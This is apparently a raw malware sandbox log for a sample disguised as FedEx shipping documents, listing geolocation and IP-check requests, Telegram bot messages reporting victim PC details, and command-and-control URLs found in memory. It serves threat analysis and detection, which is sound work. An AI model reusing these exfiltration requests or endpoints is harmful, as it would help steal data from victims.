        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813848%0D%0ADate%20and%20Time:%2018/02/2025%20/%2014:26:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20813848%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813848%0D%0ADate%20and%20Time:%2018/02/2025%20/%2018:40:42%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20813848%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813848%0D%0ADate%20and%20Time:%2018/02/2025%20/%2015:06:25%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20813848%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
        Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
        Source: global trafficDNS traffic detected: DNS query: api.telegram.org
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 18 Feb 2025 07:12:16 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 18 Feb 2025 07:12:33 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 18 Feb 2025 07:12:39 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
        Source: hzwdvhxM.pif, 00000007.00000002.3928012467.00000000297DE000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3928176067.0000000025D2E000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3931012039.000000002A9A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
        Source: hzwdvhxM.pif, 00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000003.1467552479.000000002792F000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3927113421.00000000293E0000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000003.1592650424.0000000023E4C000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3927698614.0000000025990000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3930139292.000000002A5C0000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000003.1679054721.0000000028ABC000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
        Source: hzwdvhxM.pif, 00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000003.1467552479.000000002792F000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3928012467.0000000029711000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3927113421.00000000293E0000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000003.1592650424.0000000023E4C000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3927698614.0000000025990000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3928176067.0000000025C81000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3930139292.000000002A5C0000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000003.1679054721.0000000028ABC000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3931012039.000000002A8C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
        Source: hzwdvhxM.pif, 00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000003.1467552479.000000002792F000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3928012467.0000000029711000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3927113421.00000000293E0000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000003.1592650424.0000000023E4C000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3927698614.0000000025990000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3928176067.0000000025C81000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3930139292.000000002A5C0000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000003.1679054721.0000000028ABC000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3931012039.000000002A8C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
        Source: hzwdvhxM.pif, 00000007.00000002.3928012467.0000000029711000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3928176067.0000000025C81000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3931012039.000000002A8C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
        Source: hzwdvhxM.pif, 00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000003.1467552479.000000002792F000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3927113421.00000000293E0000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000003.1592650424.0000000023E4C000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3927698614.0000000025990000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3930139292.000000002A5C0000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000003.1679054721.0000000028ABC000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
        Source: hzwdvhxM.pif, 00000007.00000002.3928012467.0000000029711000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3928176067.0000000025C81000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3931012039.000000002A8C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: hzwdvhxM.pif, 00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000003.1467552479.000000002792F000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3928012467.0000000029711000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3927113421.00000000293E0000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000003.1592650424.0000000023E4C000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3927698614.0000000025990000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3928176067.0000000025C81000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3930139292.000000002A5C0000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000003.1679054721.0000000028ABC000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3931012039.000000002A8C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
        Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, Mxhvdwzh.PIF.0.drString found in binary or memory: http://www.denisdraw.fr
        Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, Mxhvdwzh.PIF.0.drString found in binary or memory: http://www.denisdraw.frArdoise
        Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000002.1500660280.0000000021570000.00000004.00000020.00020000.00000000.sdmp, FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000002.1498803123.0000000020C3D000.00000004.00001000.00020000.00000000.sdmp, FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000003.1435849334.000000007EE56000.00000004.00001000.00020000.00000000.sdmp, FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000003.1435508711.000000007EE1F000.00000004.00001000.00020000.00000000.sdmp, FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000002.1459096681.0000000000786000.00000004.00000020.00020000.00000000.sdmp, FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000002.1501884350.0000000021889000.00000004.00001000.00020000.00000000.sdmp, FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000003.1435849334.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3896174260.0000000000436000.00000040.00000400.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000000.1451431606.0000000000416000.00000002.00000001.01000000.00000005.sdmp, Mxhvdwzh.PIF, 0000000B.00000002.1593207176.00000000025DF000.00000004.00001000.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000000.1588796045.0000000000416000.00000002.00000001.01000000.00000005.sdmp, Mxhvdwzh.PIF, 0000000D.00000002.1678940932.0000000002959000.00000004.00001000.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000000.1673804805.0000000000416000.00000002.00000001.01000000.00000005.sdmp, hzwdvhxM.pif.0.drString found in binary or memory: http://www.pmail.com
        Source: hzwdvhxM.pif, 00000007.00000003.3266544740.000000002A9DD000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3930482210.000000002A793000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000003.3694016126.0000000026F4C000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3930369501.0000000026D03000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BB8C000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3934166321.000000002B943000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: hzwdvhxM.pif, 00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000003.1467552479.000000002792F000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3928012467.00000000297DE000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3927113421.00000000293E0000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000003.1592650424.0000000023E4C000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3927698614.0000000025990000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3928176067.0000000025C81000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3930139292.000000002A5C0000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000003.1679054721.0000000028ABC000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3931012039.000000002A98C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
        Source: hzwdvhxM.pif, 00000007.00000003.3266544740.000000002A9DD000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3930482210.000000002A793000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000003.3694016126.0000000026F4C000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3930369501.0000000026D03000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BB8C000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3934166321.000000002B943000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: hzwdvhxM.pif, 00000007.00000003.3266544740.000000002A9DD000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3930482210.000000002A793000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000003.3694016126.0000000026F4C000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3930369501.0000000026D03000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BB8C000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3934166321.000000002B943000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
        Source: hzwdvhxM.pif, 00000007.00000003.3266544740.000000002A9DD000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3930482210.000000002A793000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000003.3694016126.0000000026F4C000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3930369501.0000000026D03000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BB8C000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3934166321.000000002B943000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: hzwdvhxM.pif, 00000007.00000002.3928012467.00000000297DE000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3928176067.0000000025D2E000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3931012039.000000002A9A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
        Source: hzwdvhxM.pif, 00000007.00000003.3266544740.000000002A9DD000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3930482210.000000002A793000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000003.3694016126.0000000026F4C000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3930369501.0000000026D03000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BB8C000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3934166321.000000002B943000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: hzwdvhxM.pif, 00000007.00000003.3266544740.000000002A9DD000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3930482210.000000002A793000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000003.3694016126.0000000026F4C000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3930369501.0000000026D03000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BB8C000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3934166321.000000002B943000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
